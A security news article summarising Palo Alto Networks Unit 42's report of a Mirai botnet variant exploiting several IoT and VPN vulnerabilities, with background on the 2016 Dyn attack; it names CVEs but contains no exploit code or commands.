Security researchers from Palo Alto Networks have discovered another Mirai variant that is targeting new IoT vulnerabilities.
Researchers from Unit 42, the cybersecurity division of Palo Alto Networks, discovered a number of attacks on Feb 16th, 2021 that leveraged vulnerabilities including:
VisualDoor (a SonicWall SSL-VPN exploit).
CVE-2020-25506 (a D-Link DNS-320 firewall exploit).
CVE-2020-26919 (a Netgear ProSAFE Plus exploit).
Possibly CVE-2019-19356 (a Netis WF2419 wireless router exploit).
Three other IoT vulnerabilities yet to be identified.
“Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,” wrote the Unit 42 researchers in a blog post.
The researchers found that one of the IPs involved in the attack was updated on Feb 23rd to take advantage of two newer vulnerabilities – CVE-2021-27561 and CVE-2021-27562 – which exploit the Yealink DM platform and enable an unauthenticated attacker to run commands on the server with root privileges.
On March 13th, Unit 42 detected the addition of a further exploit that takes advantage of CVE-2020-26919—a vulnerability that affected NETGEAR JGS516PE devices.
“The IoT realm remains an easily accessible target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences,” the researchers added.
In this case, compromised devices download Mirai malware binaries which adds them to a larger IoT botnet capable of carrying out network attacks on devastating scales.
Mirai caused widespread chaos in 2016 when it hit former DNS provider Dyn and impacted popular services including PayPal, Spotify, PlayStation Network, Xbox Live, Reddit, Amazon, GitHub, and many others. Over 100,000 devices are expected to have been involved in the attack which generated an extraordinary attack strength of 1.2Tbps.
Given the rapid proliferation of IoT devices – with IDC estimating there will be 41.6 billion connected IoT devices by 2025 – and their often weak security, future attacks will likely dwarf that of the one carried out against Dyn.